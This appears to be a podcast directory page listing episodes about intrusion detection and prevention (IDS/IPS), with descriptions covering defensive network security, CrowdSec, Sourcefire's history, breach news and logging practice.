Podcasts about ids ips

  • 41PODCASTS
  • 48EPISODES
  • 44mAVG DURATION
  • 1MONTHLY NEW EPISODE
  • Apr 11, 2025LATEST

POPULARITY

20172018201920202021202220232024


Best podcasts about ids ips

Latest podcast episodes about ids ips

Packet Pushers - Heavy Networking
HN776: Security Platforms: Balancing Efficacy, Ops, and Emerging Threats (Sponsored)

Packet Pushers - Heavy Networking

Play Episode Listen Later Apr 11, 2025 49:33


Network security has evolved from stateful perimeter firewalls with maybe some IDS/IPS to a complex stack delivered as numerous unique tools, which often don’t talk to one another and may need to be operated by specialists. In this environment it’s hard to unify a security policy, troubleshoot problems, manage and operate tools, and respond effectively... Read more »

Packet Pushers - Full Podcast Feed
HN776: Security Platforms: Balancing Efficacy, Ops, and Emerging Threats (Sponsored)

Packet Pushers - Full Podcast Feed

Play Episode Listen Later Apr 11, 2025 49:33


Network security has evolved from stateful perimeter firewalls with maybe some IDS/IPS to a complex stack delivered as numerous unique tools, which often don’t talk to one another and may need to be operated by specialists. In this environment it’s hard to unify a security policy, troubleshoot problems, manage and operate tools, and respond effectively... Read more »

Packet Pushers - Fat Pipe
HN776: Security Platforms: Balancing Efficacy, Ops, and Emerging Threats (Sponsored)

Packet Pushers - Fat Pipe

Play Episode Listen Later Apr 11, 2025 49:33


Network security has evolved from stateful perimeter firewalls with maybe some IDS/IPS to a complex stack delivered as numerous unique tools, which often don’t talk to one another and may need to be operated by specialists. In this environment it’s hard to unify a security policy, troubleshoot problems, manage and operate tools, and respond effectively... Read more »

CISSP Cyber Training Podcast - CISSP Training Program
CCT 228: Secure Defaults and Domain 3 for the CISSP Exam (Domain 3.1.2)

CISSP Cyber Training Podcast - CISSP Training Program

Play Episode Listen Later Mar 17, 2025 36:12 Transcription Available


Send us a textThe cybersecurity landscape is constantly evolving, with even major corporations falling victim to devastating attacks. A recent UnitedHealthcare ransomware incident cost the company $22 million, with fingers pointing at leadership for allegedly appointing an unqualified CISO. This sobering reality highlights why defense in depth strategies aren't just theoretical concepts—they're essential protective measures for organizations of all sizes.Defense in depth implements multiple security layers that work together like a medieval castle's defenses. When one layer fails, others remain to protect your assets. This approach serves two crucial functions: frustrating attackers enough that they move to easier targets, and creating trigger points that alert your team to potential breaches. From firewalls and IDS/IPS systems to role-based access controls and encryption, each layer contributes to a comprehensive security posture.Beyond implementing multiple controls, we explore the critical concept of secure defaults—ensuring systems are configured securely from the moment they're deployed. Unfortunately, many products arrive with functionality prioritized over security, requiring security teams to implement proper configurations before deployment. This includes setting up strong password requirements, disabling unnecessary services, configuring automatic updates, and establishing proper network rules.Balancing security with usability presents ongoing challenges. Each additional security layer adds complexity, impacts performance, and potentially frustrates users. The most effective security professionals find that sweet spot where protection is robust without driving users to circumvent controls. Documentation, regular reviews, and automated configuration management form the foundation of sustainable security practices.Ready to enhance your security knowledge and prepare for your CISSP certification? Visit CISSPCyberTraining.com for my comprehensive blueprint and sign up for 360 free practice questions to help you pass your exam the first time.Gain exclusive access to 360 FREE CISSP Practice Questions delivered directly to your inbox! Sign up at FreeCISSPQuestions.com and receive 30 expertly crafted practice questions every 15 days for the next 6 months—completely free! Don't miss this valuable opportunity to strengthen your CISSP exam preparation and boost your chances of certification success. Join now and start your journey toward CISSP mastery today!

Virtually Speaking Podcast
Achieving Zero Trust with VMware NSX Security and vDefend

Virtually Speaking Podcast

Play Episode Listen Later Nov 26, 2024 14:04


In this episode of the Virtually Speaking Podcast, we're joined by Marc van de Logt, Technical Architect at PQR, to explore the latest advancements in VMware NSX Security. We dive into VMware vDefend, including its integration with NSX Firewalling, NAPP deployment using Avi Loadbalancer, and cutting-edge tools like Security Intelligence, NTA, IDS/IPS, and NDR. Marc also introduces VMware's Project Cypress and shares insights on how VMware vDefend supports organizations in implementing a robust zero trust architecture. Tune in to learn how these technologies can elevate your security strategy.

Inside the Network
Marty Roesch: Scaling Sourcefire and creating a new way to monetize open source security software

Inside the Network

Play Episode Listen Later Jul 7, 2024 67:05 Transcription Available


In this episode, we sit down with Marty Roesch, founder of Sourcefire. Sourcefire led the intrusion detection and protection (IDS/IPS) wave, raised four rounds of financing from leading VCs like NEA, Sierra Ventures, and Sequoia, and went public, later to be acquired by Cisco for $2.7 billion.Founders often believe that their first few customers cannot be large enterprises. Marty took the contrarian path. Sourcefire's first few customers were all six-figure deals - PWC, Intel, SAIC, and International Paper. In addition to that, Sourcefire was incredibly successful in working with industry research firms like Gartner and organizations like SANS in developing a new category. In this podcast, Marty shares what happened behind the scenes and provides founders with advice on how to work with enterprises and gain the interest of industry analysts.Almost two decades after starting Sourcefire, Marty has gone back full circle to being the CEO of Netography, a network security startup. Marty shares stories from both his Sourcefire and Netography journeys, discusses how he navigated the M&A landscape and explains where we should be excited about AI in security, and where it's wise to be cautious.

The Daily Decrypt - Cyber News and Discussions
Key Takeaways from the Ticketmaster breach and Amazon re:Inforce in Philadelphia

The Daily Decrypt - Cyber News and Discussions

Play Episode Listen Later Jun 13, 2024


In today's episode, we explore recent major cybersecurity upgrades aimed at safeguarding the American healthcare system, including a new initiative by Microsoft to provide critical cybersecurity resources to rural hospitals. Additionally, we delve into the Ticketmaster-Snowflake data breach perpetrated by ShinyHunters, targeting 560 million users and exposing key vulnerabilities in cloud environments. Lastly, we cover AWS's new and improved security features announced at the re:Inforce conference, which include added multi-factor authentication options, expanded malware protection for Amazon S3, and updated AI apps governance. Read more at: https://www.helpnetsecurity.com/2024/06/12/american-healthcare-cybersecurity/ https://thehackernews.com/2024/06/lessons-from-ticketmaster-snowflake.html https://www.helpnetsecurity.com/2024/06/12/aws-security-features/ Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/ Logo Design by https://www.zackgraber.com/ Tags Microsoft, Cyberattacks, Healthcare systems, Rural hospitals, ShinyHunters, Breach, Data, Cybersecurity, AWS, FIDO2 passkeys, Malware protection, Cloud environment Search Phrases How Microsoft is protecting rural hospitals from cyberattacks Cybersecurity initiatives for rural healthcare by Microsoft ShinyHunters data breach impact on cloud security Essential measures to prevent cyberattacks in cloud environments Latest AWS security features from re:Inforce conference How FIDO2 passkeys enhance cloud environment security Updated malware protection for AWS S3 buckets Microsoft and Biden-Harris Administration cybersecurity efforts Impact of ShinyHunters breach on data security practices Advanced multi-factor authentication in AWS cloud environments Major cybersecurity upgrades announced to safeguard American healthcare https://www.helpnetsecurity.com/2024/06/12/american-healthcare-cybersecurity/ Rising Threats: Cyberattacks on American healthcare systems soared 128% from 2022 to 2023, leading to significant disruptions in hospital operations and payment systems. Actionable Insight: Healthcare professionals should stay vigilant and ensure their organizations have updated cybersecurity measures to mitigate risks. Impact of Recent Attacks: In early 2024, a major cyberattack affected one-third of healthcare claims in the U.S., delaying payments and services. Critical Implication: Entry to mid-level cybersecurity professionals should focus on protecting payment systems and ensuring quick recovery plans are in place. Government Initiatives: The Biden-Harris Administration launched several initiatives to bolster healthcare cybersecurity, including a new gateway website and voluntary performance goals. Actionable Insight: Healthcare institutions should leverage these resources to enhance their cybersecurity posture. Collaboration for Solutions: In May 2024, the White House gathered industry leaders to discuss cybersecurity challenges and promote secure-by-design solutions. Engagement Suggestion: Ask listeners how their organizations collaborate with other entities to share threat intelligence and improve security. ARPA-H UPGRADE Program: The Advanced Research Projects Agency for Health introduced the UPGRADE program, investing over $50 million in tools to defend hospital IT environments. Actionable Insight: IT teams should explore participation in this program to access cutting-edge cybersecurity tools and support. Rural Hospital Support: Cyber disruptions severely impact rural hospitals. Leading tech companies, including Microsoft and Google, committed to providing free or discounted cybersecurity resources to these institutions. Critical Implication: Rural hospital IT staff should take advantage of these offers to strengthen their defenses against cyberattacks. Microsoft's Cybersecurity Program: Microsoft announced a program offering up to 75% discounts on security products, free cybersecurity assessments, and training for rural hospitals. Actionable Insight: Rural healthcare providers should engage with Microsoft's program to improve their cybersecurity measures and resilience. Google's Contributions: Google will offer endpoint security advice and discounted communication tools to rural hospitals, along with a pilot program to tailor security solutions to their needs. Engagement Suggestion: Prompt listeners to consider what specific cybersecurity challenges their rural hospitals face and how these new initiatives could assist them. Continued Efforts: The White House and industry leaders emphasize the importance of private-public partnerships to ensure the security and functionality of healthcare systems nationwide. Efficiency Tip: Cybersecurity professionals should stay informed about these partnerships and actively participate to benefit from shared knowledge and resources. Lessons from the Ticketmaster-Snowflake Breach https://thehackernews.com/2024/06/lessons-from-ticketmaster-snowflake.html ShinyHunters Breach: Last week, hacker group ShinyHunters allegedly stole 1.3 terabytes of data from 560 million Ticketmaster users. The breach could expose massive amounts of personal data and has sparked significant concern. Listener Question: How can we ensure our data is safe with such large-scale breaches happening? Actionable Insight: Regularly update passwords and enable multi-factor authentication (MFA) on all accounts. Live Nation Confirms Breach: Live Nation confirmed the breach in an SEC filing, stating unauthorized activity occurred in a third-party cloud database. An investigation is ongoing, and law enforcement is involved. Listener Question: What steps should companies take immediately after discovering a breach? Actionable Insight: Initiate a comprehensive investigation, notify affected parties, and work with law enforcement. Santander Also Affected: ShinyHunters claim to have data from Santander, affecting millions of customers and employees in Chile, Spain, and Uruguay. The breach involved a third-party provider. Listener Question: Should we be worried about third-party services? Actionable Insight: Ensure third-party services adhere to stringent security protocols and regularly review their security measures. Snowflake Connection: Both Ticketmaster and Santander used Snowflake for their cloud databases. Snowflake warned of increased cyber threats targeting customer accounts, urging users to review logs for unusual activity. Listener Question: What can companies do to safeguard their cloud data? Actionable Insight: Enforce MFA, set network policies to limit access, and regularly rotate credentials. Snowflake's Response: Snowflake's CISO clarified their system wasn't breached; single-factor authentication vulnerabilities were exploited. They recommend MFA and network policy rules for enhanced security. Mitiga's Research: Mitiga found the attacks exploited environments without two-factor authentication, primarily using commercial VPN IPs to execute attacks. Listener Question: How can we protect against these types of attacks? Actionable Insight: Implement and enforce MFA, utilize corporate SSO, and regularly monitor for unusual login activity. Cloud Security Challenges: Modern cloud environments limit some security controls. Ensure platforms offer APIs for privileged identity management and integrate with corporate security. Listener Question: What should we look for in a cloud service provider? Actionable Insight: Choose providers that support MFA, SSO, password rotation, and centralized logging. Non-Human Identities: Protecting non-human identities like service accounts is challenging but necessary. Snowflake provides guidance on securing these accounts. Listener Question: How do we secure non-human identities? Actionable Insight: Use strong, unique passwords and rotate credentials frequently for service accounts. Cost of Cyber Attacks: Cybercriminals aim to maximize profit through mass, automated attacks like credential stuffing. Simple security measures can make these attacks less feasible. Listener Question: What simple measures can we take to protect against cyber attacks? Actionable Insight: Implement SSO, MFA, and regular password rotation to increase the cost and complexity for attackers. Remember, these insights are not just theoretical—they can help you strengthen your organization's security posture today!` AWS unveils new and improved security features https://www.helpnetsecurity.com/2024/06/12/aws-security-features/ Key Information and Actionable Insights Multi-Factor Authentication (MFA) Upgrades: New Option: AWS introduces support for FIDO2 passkeys as an additional MFA method. Security Assurance: FIDO2 security keys offer the highest level of security, ideal for environments with stringent regulatory requirements (FIPS-certified devices). Considerations: Evaluate passkey providers' security models, especially for access and recovery. Enhanced Access Management: IAM Access Analyzer Update: Now assists in identifying and removing unused roles, access keys, and passwords. Permissions Management: Helps set, verify, and refine unused permissions to maintain a streamlined and secure access environment. Malware Protection for Amazon S3: GuardDuty Expansion: Now detects malicious file uploads in S3 buckets. Configuration Options: Teams can set up post-scan actions like object tagging or use Amazon EventBridge to manage malware isolation processes. AI Apps Governance: Audit Manager Update: New AI best practice framework simplifies evidence collection and ongoing compliance audits. Standard Controls: Includes 110 pre-configured controls organized under domains such as accuracy, fairness, privacy, resilience, responsibility, safety, security, and sustainability. Additional Improvements: Log Analysis: Simplified through natural language queries that produce SQL queries (currently in preview). Network Services Integration: Streamlined process for incorporating firewalls, IDS/IPS, and other network services into customers' WANs.

Blue Security
Network Security 101

Blue Security

Play Episode Listen Later Jun 19, 2023 26:23


On this week's episode, Adam and Andy talk about the basics of network security. They go over asset management, firewalls, IDS/IPS, NDR's, and administrative access. If you're new to security enterprise networks, listen in! ------------------------------------------- Youtube Video Link: https://youtu.be/ewwhQeyIRWs⁠⁠ ------------------------------------------- Contact Us: Website: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://bluesecuritypod.com⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ Twitter: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://twitter.com/bluesecuritypod⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ Linkedin: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.linkedin.com/company/bluesecpod⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ Youtube: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.youtube.com/c/BlueSecurityPodcast⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ Twitch: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.twitch.tv/bluesecuritypod⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ ------------------------------------------- Andy Jaw Mastodon: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://infosec.exchange/@ajawzero⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ Twitter: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://twitter.com/ajawzero⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ LinkedIn: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.linkedin.com/in/andyjaw/⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ Email: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠andy@bluesecuritypod.com⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ ------------------------------------------- Adam Brewer Twitter: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://twitter.com/ajbrewer⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ LinkedIn: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠https://www.linkedin.com/in/adamjbrewer/⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠ Email: ⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠⁠adam@bluesecuritypod.com --- Send in a voice message: https://podcasters.spotify.com/pod/show/blue-security-podcast/message

Tech & Main Presents
Protecting Against The Known and Unknown | Aviv Grafi

Tech & Main Presents

Play Episode Listen Later May 8, 2023 19:04


Aviv Grafi is Founder and CTO of Votiro, an award-winning cybersecurity company that helps organizations accept safe content and data inbound, at scale, through Votiro's open, API-based content disarm and reconstruction-as-a-service technology. Aviv is the principal software architect for Votiro's enterprise solution, Votiro Cloud, which protects against known and unknown malware and ransomware in data, regardless of data source or destination. Prior to co-founding Votiro, Grafi served in an elite intelligence unit of the IDF, nurturing his passion for finding simple solutions to complex security issues. His areas of expertise span the cyber product lifecycle—from strategy and development, through go-to market—along with network security, IDS/IPS/firewall internals, defensive programming, enterprise security penetration testing, vulnerability research, and virtualization. For more information, visit https://www.linkedin.com/in/aviv-grafi-63426b1/ or https://votiro.com/. --- Send in a voice message: https://podcasters.spotify.com/pod/show/techandmain/message

Security Conversations
Down memory lane with Snort and Sourcefire creator Marty Roesch

Security Conversations

Play Episode Listen Later Jul 25, 2022 67:34


Network security pioneer Marty Roesch takes listeners on a trip down memory lane, sharing stories from the creation of Snort back in the 1990s, the startup journey of building Sourcefire into an IDS/IPS powerhouse and selling the company for $2 billion, the U.S. government killing a Check Point acquisition, and his newest adventure as chief executive at Netography.

Ask Noah Show
Episode 294: Crowd Sourced Security with Philippe Humeau

Ask Noah Show

Play Episode Listen Later Jul 13, 2022 53:52


Philippe Humeau joins us this hour to talk about CrowdSec - an IDS/IPS that uses crowd sourced information to evaluate threats on your network! -- During The Show -- 01:00 New Red Hat CEO Matt Hicks New Red Hat CEO (https://www.redhat.com/en/about/press-releases/red-hat-names-matt-hicks-president-and-chief-executive-officer) 03:44 Remove all traces of a user on logout? - Wayne TailsOS (https://tails.boum.org/) Noah's hackish solution TempFS? RamDisk? SquashFS? 'Delete' isn't a thing (Inodes) PhotoRec (https://www.cgsecurity.org/wiki/PhotoRec) 09:30 Recommendations for hosting provider - Gary Gary's Site (https://www.shawanga.com/) Host Gator Self Host with Hugo Tied to Hosting provider 14:00 Listener responds about CAD on Linux - Heath FreeCAD (https://www.freecad.org/) LibreCAD (https://librecad.org/) TinkerCAD (https://www.tinkercad.com/) Run under Wine 15:30 More Info about Steve's Solar? - Ian Steve likes his EnPhase Solar (https://enphase.com/) setup Hacks Home Assistant Integration (https://github.com/briancmpbll/home_assistant_custom_envoy) 18:30 News Wire Linux Better on i9 Systems Ghacks (https://www.ghacks.net/2022/07/09/linux-is-performing-better-than-windows-11-according-to-this-benchmark-test/) UltimateXR XR Today (https://www.xrtoday.com/virtual-reality/ultimatexr-launches-free-open-source-unity-tool/) EMQX 5.0 EIN News (https://www.einnews.com/pr_news/580326713/emqx-5-0-released-the-ultra-scalable-open-source-mqtt-broker) Calibre 6.0 9 to 5 Linux (https://9to5linux.com/calibre-6-0-released-with-full-text-search-arm64-support-on-linux-qt-6-port) Budgie Desktop 10.6.2 Buddies of Budgie (https://blog.buddiesofbudgie.org/budgie-10-6-2-released/) Linux Mint 21 Beta 9 to 5 Linux (https://9to5linux.com/linux-mint-21-beta-is-now-available-for-download-heres-a-first-look) Debian GNU/Linux 11.4 9 to 5 Linux (https://9to5linux.com/debian-gnu-linux-11-4-bullseye-released-with-79-security-updates-and-81-bug-fixes) Kali Linux on Linode Help Net Security (https://www.helpnetsecurity.com/2022/07/11/linode-kali-linux/) Paladin Cloud Security-as-Code Virtualization Review (https://virtualizationreview.com/articles/2022/07/11/paladin-cloud.aspx) Android Zero Day XDA Developers (https://www.xda-developers.com/pixel-6-galaxy-s22-linux-kernel-vulnerability-root-android/) OrBit Malware Cyper Security News (https://cybersecuritynews.com/orbit-undetected-linux-malware/) CrowdSec Interview Philippe Ew-Mow from CrowdSec (https://www.crowdsec.net/) What is CrowdSec How CrowdSec works Domains and Hashes vs IP Address and Behavior How IPs are cleaned Reporting based on "identity" not IP Address IDS and IPS CrowdSec Agent and CrowdSec Console Open Source Cyber Threat Intelligence (CTI) CrowdSec API How does CrowdSec resolve IDS and IPS problems? Blocking Unique Attacks The 3 Tiers of Crowdsec CrowdSec and GDPR Using Crowdsec Bouncers (IPS) CrowdSec Best Practices Replay Mode Integration into Firewalls CrowdSec on OPNSense (https://www.crowdsec.net/blog/crowdsec-arrives-on-opnsense) Best place to get started/learn CrowdSec Docs (doc.crowdsec.net) 49:00 Thoughts on CrowdSec Noah has been playing with CrowdSec Can also identify and block malicious out going traffic 51:00 Interview with Matt Hicks Interview with Matt Hicks (YouTube) (https://www.youtube.com/watch?v=qWg5cRH9YQg) -- The Extra Credit Section -- For links to the articles and material referenced in this week's episode check out this week's page from our podcast dashboard! This Episode's Podcast Dashboard (http://podcast.asknoahshow.com/294) Phone Systems for Ask Noah provided by Voxtelesys (http://www.voxtelesys.com/asknoah) Join us in our dedicated chatroom #GeekLab:linuxdelta.com on Matrix (https://element.linuxdelta.com/#/room/#geeklab:linuxdelta.com) -- Stay In Touch -- Find all the resources for this show on the Ask Noah Dashboard Ask Noah Dashboard (http://www.asknoahshow.com) Need more help than a radio show can offer? Altispeed provides commercial IT services and they're excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show! Altispeed Technologies (http://www.altispeed.com/) Contact Noah live [at] asknoahshow.com -- Twitter -- Noah - Kernellinux (https://twitter.com/kernellinux) Ask Noah Show (https://twitter.com/asknoahshow) Altispeed Technologies (https://twitter.com/altispeed) Special Guest: Steve Ovens.

Ask Noah HD Video
Crowd Sourced Security with Philippe Humeau

Ask Noah HD Video

Play Episode Listen Later Jul 12, 2022


Philippe Humeau joins us this hour to talk about CrowdSec - an IDS/IPS that uses crowd sourced information to evaluate threats on your network!

Control System Cyber Security Association International: (CS)²AI
41: Writing a Book to Leverage Your Expertise and Improve Your Career with Pascal Ackerman

Control System Cyber Security Association International: (CS)²AI

Play Episode Listen Later Jun 7, 2022 50:40


Derek Harp is happy to welcome Pascal Ackerman as his guest for today's podcast! Pascal is a security professional, focused on industrial control systems and he's currently the Sr Security Consultant for Operational Technology - Threat & Attack Simulation at GuidePoint Security. He has a Master's of Science degree in Electrical Engineering (MSEE/CE). He has had 18 years of experience in industrial Ethernet design and support, information and network security, risk assessments, pen-testing, forensics, and threat hunting, WAN/LAN/Internet and Wireless Technologies, Windows Environments, Unix, Linux, IIS, and Apache. He specialized in the architecture, engineering, and securing of plant-wide Ethernet networks using Purdue-model design strategies, IDS/IPS sensors, network monitoring, Security Information, and Event Management (SIEM) solutions, next-gen firewalls, MS domain services, WSUS servers, MS SQL server clusters, etc. Pascal was born and raised in the Netherlands. Right after leaving high school, he was put behind a POC by a company that sent him out across the world installing prototype machinery for filling machines. He is an engineer, programmer, gamer, hacker, traveler, tinkerer, pen-tester, and father.  In this episode of the (CS)²AI Podcast, he shares his superhero backstory and discusses his certifications, his education, and his career path. He also offers advice for those who would like to get into the field of cybersecurity and people thinking about writing a book. If you are considering a career in cybersecurity or if you are an engineer and want to specialize in cyber security, you will gain a lot from this podcast! Stay tuned for more! Show highlights: After leaving college, Pascal stayed with the company where he did his internship. The company got him to set up a software simulation to test their POC programs and later put him on their commissioning team. (6:51) Pascal talks about what he did while working as a controls engineer. (8:08) How Pascal got invited to move to the US to continue with his work. (9:50) Pascal explains how many doors opened for him after presenting his first report in 2005. (12:27) Pascal talks about how security measures first intersected with his work in 2008-2009. (14:07) Pascal pinpoints the moment when he decided to change his career path. (16:00) Pascal offers advice for traditional engineers who want to improve what they do and join the cyber security workforce. (17:35) A Network Plus certification will help controls engineers understand the fundamentals of networking. (18:19)  Pascal explains why he got hired as a commercial engineer in Network and Security at Rockwell. (21:16) Pascal talks about his book, Industrial Cybersecurity. (23:39) The book Hacking Exposed by Clint Bodungen inspired Pascal to write his first book. (27:50) How Threat GEN became a company based around a game Pascal developed. (29:10) Pascal offers advice on where people in IT who want to know more about safety, reliability, resiliency, and POCs can start. (32:36) The most successful companies have a combined IT and OT team with knowledgeable people on both sides. (36:43) Why do you need to figure out what you like the most and focus on that technology? (37:58) Architecture will be the next big step for monitoring everything. (45:06) Pascal discusses the process of writing his books and offers advice for those who would like to write a book. (45:49) Links: https://www.cs2ai.org/ ((CS)²AI) https://www.linkedin.com/in/pascal-ackerman-036a867b/ (Pascal Ackerman on LinkedIn) https://www.amazon.com/Industrial-Cybersecurity-Efficiently-cybersecurity-environment/dp/1800202091 (Industrial Cybersecurity by Pascal Ackerman) Books mentioned: https://www.amazon.com/Hacking-Exposed-Industrial-Control-Systems/dp/1259589714 (Hacking Exposed by Clint Bodungen) Mentioned in this episode: Our Sponsors: We'd like to thank our sponsors for their faithful...

@BEERISAC: CPS/ICS Security Podcast Playlist
41: Writing a Book to Leverage Your Expertise and Improve Your Career with Pascal Ackerman

@BEERISAC: CPS/ICS Security Podcast Playlist

Play Episode Listen Later Jun 7, 2022 49:35


Podcast: Control System Cyber Security Association International: (CS)²AIEpisode: 41: Writing a Book to Leverage Your Expertise and Improve Your Career with Pascal AckermanPub date: 2022-06-07Derek Harp is happy to welcome Pascal Ackerman as his guest for today's podcast!Pascal is a security professional, focused on industrial control systems and he's currently the Managing Director of Threat Services at ThreatGEN. He has a Master's of Science degree in Electrical Engineering (MSEE/CE). He has had 18 years of experience in industrial Ethernet design and support, information and network security, risk assessments, pen-testing, forensics, and threat hunting, WAN/LAN/Internet and Wireless Technologies, Windows Environments, Unix, Linux, IIS, and Apache.He specialized in the architecture, engineering, and securing of plant-wide Ethernet networks using Purdue-model design strategies, IDS/IPS sensors, network monitoring, Security Information, and Event Management (SIEM) solutions, next-gen firewalls, MS domain services, WSUS servers, MS SQL server clusters, etc.Pascal was born and raised in the Netherlands. Right after leaving high school, he was put behind a POC by a company that sent him out across the world installing prototype machinery for filling machines. He is an engineer, programmer, gamer, hacker, traveler, tinkerer, pen-tester, and father. In this episode of the (CS)²AI Podcast, he shares his superhero backstory and discusses his certifications, his education, and his career path. He also offers advice for those who would like to get into the field of cybersecurity and people thinking about writing a book.If you are considering a career in cybersecurity or if you are an engineer and want to specialize in cyber security, you will gain a lot from this podcast! Stay tuned for more!Show highlights:After leaving college, Pascal stayed with the company where he did his internship. The company got him to set up a software simulation to test their POC programs and later put him on their commissioning team. (6:51)Pascal talks about what he did while working as a controls engineer. (8:08)How Pascal got invited to move to the US to continue with his work. (9:50)Pascal explains how many doors opened for him after presenting his first report in 2005. (12:27)Pascal talks about how security measures first intersected with his work in 2008-2009. (14:07)Pascal pinpoints the moment when he decided to change his career path. (16:00)Pascal offers advice for traditional engineers who want to improve what they do and join the cyber security workforce. (17:35)A Network Plus certification will help controls engineers understand the fundamentals of networking. (18:19) Pascal explains why he got hired as a commercial engineer in Network and Security at Rockwell. (21:16)Pascal talks about his book, Industrial Cybersecurity. (23:39)The book Hacking Exposed by Clint Bodungen inspired Pascal to write his first book. (27:50)How Threat GEN became a company based around a game Pascal developed. (29:10)Pascal offers advice on where people in IT who want to know more about safety, reliability, resiliency, and POCs can start. (32:36)The most successful companies have a combined IT and OT team with knowledgeable people on both sides. (36:43)Why do you need to figure out what you like the most and focus on that technology? (37:58)Architecture will be the next big step for monitoring everything. (45:06)Pascal discusses the process of writing his books and offers advice for those who would like to write a book. (45:49)Links:(CS)²AIPascal Ackerman on LinkedInIndustrial Cybersecurity by Pascal AckermanBooks mentioned:Hacking Exposed by Clint BodungenThe podcast and artwork embedded on this page are from Derek Harp, which is the property of its owner and not affiliated with or endorsed by Listen Notes, Inc.

Data Center Therapy
#080 - Ransomware Preparedness with Quinton Barbe

Data Center Therapy

Play Episode Listen Later May 12, 2022 40:55


Cliched though it may be, it's true: It's not if you're going to experience a ransomware attack, it's just a matter of when. What can you do to prepare for it? Matt “It's 2022 but Backup is still Sexy” Yette  and Matt “Trip this Wire” Cozzolino welcome back to the virtual studios for the second time in a row IVOXY's own Mr. Quinton Barber, Security Consultant, who counts acting as an Anti-Ransomware Specialist as one of his many responsibilities.  Quinton and the Matts waste no time and begin to prescribe steps you can take to harden your environment, instrument your infrastructure, and shorten the time to restore when something happens to your data. In this episode you, our loyal and proactive but ransomware-prone listeners will get to hear about: What aggregation of logs and the use of a SIEM means to your business, and how it can inform your decision makers of when to restore from (known good backup points) in a Business Continuity event. How long to set your log retention for both compliance for your business and for forensics purposes for your infrastructure.   What the costs of business are, so to speak, when it comes to running the adjunct compute, storage, and networking you need to effectively monitor and alert on events. How cutting-edge technologies like suspicious-activity snapshots from storage vendors is changing the way ransomware events are handled If phrases like event correlation, firewalls, IDS/IPS, and MDR garner your interest, this episode's going to be a great one for you.  On the other hand, Quinton and your DCT hosts do their best to keep things very understandable and relatable if your ransomware concerns are there, but your own knowledge of all those anti-ransomware tools needs augmentation.  If you'd like to attend one of IVOXY's Security Roundtables, please reach out to your Account Manager and we'd be happy to help.  If you enjoyed this episode, please be sure to like, share and subscribe wherever you found our quality podcast.  Lock it down and stay tuned for another exciting episode of Data Center Therapy!  Thanks for listening!

Brakeing Down Security Podcast
SPONSOR-Blumira's Nato Riley on Log Classification, Security Maturity,

Brakeing Down Security Podcast

Play Episode Listen Later Nov 1, 2021 44:09


 From Nato's email:Hi Bryan,   Discussing the challenges that come with not having good logging in place could be a great topic!  We could make it partly about how security maturity works, in the idea that security generally starts with awareness and visibility.   The topic sort of gets into the idea that knowing is half the battle, so logging can be transformative for helping a company properly secure themselves from online risks!   What do you think of this topic idea?   https://www.blumira.com/careers/ https://thenewstack.io/logging-and-monitoring-why-you-need-both/   https://prometheus.io/ https://www.sentinelone.com/blog/the-10-commandments-of-logging/   https://towardsdatascience.com/why-should-you-care-about-logging-442a195b80a1   https://www.g2.com/products/blumira-automated-detection-response/reviews#survey-response-4908309   (wouldn't you know it… a couple additional google searches, and I find this -brbr)https://www.executivegov.com/2021/08/omb-creates-maturity-framework-for-event-log-management/) https://insidecybersecurity.com/sites/insidecybersecurity.com/files/documents/2021/may/cs2021_0089c.pdf   Logging maturity in the US gov (OMB policy doc): https://www.whitehouse.gov/wp-content/uploads/2021/08/M-21-31-Improving-the-Federal-Governments-Investigative-and-Remediation-Capabilities-Related-to-Cybersecurity-Incidents.pdf   Are there examples of devices that don't give out logs? What if your vendor does not allow you to have logs? Can you create logs based on the activity of the device? What would that look like? Types of logs: Application logs Network logs Endpoint security logs OS logs IDS/IPS logs Vuln scanner logs  

TechVibe Radio
TechVibe Geek Out: Advanticom Details Its Active Threat Incident Response Team

TechVibe Radio

Play Episode Listen Later Aug 6, 2021 21:55


TechVibe Radio geeks out with Advanticom's Keith Arnold to explore its Active Threat Incident Response Team. Keith discusses the  benefit of leveraging a managed security service provider for your security needs is their ability to threat hunt or proactively look for any undetected threats within your network. Advanticom has the unique ability to not only defend against a breach but also engage in direct breach and incident response. We are on the edge of major incidents and outbreaks with phishing, ransomware, and advanced persistent threat (APT) groups. Should something be identified, Advanticom's experts will begin their emergency security response which includes a plan to minimize any negative impact on the business and will immediately start the process to contain and isolate the threat. As part of Advanticom's unique solution, its team will install network sensors for IDS/IPS while leveraging EPP and EDR monitoring from our forensics team. In the event of an emergency, it can install a logging platform and correlation engine to assist in containment. This will immediately help Advanticom's managed security services group transition into eradication and remediation efforts.  Founded in 1995, Advanticom has 